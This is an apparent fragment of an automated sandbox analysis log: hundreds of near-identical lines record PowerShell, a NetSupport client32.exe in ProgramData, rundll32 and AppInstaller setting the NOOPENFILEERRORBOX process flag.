                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\netsupport\client\client32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOX
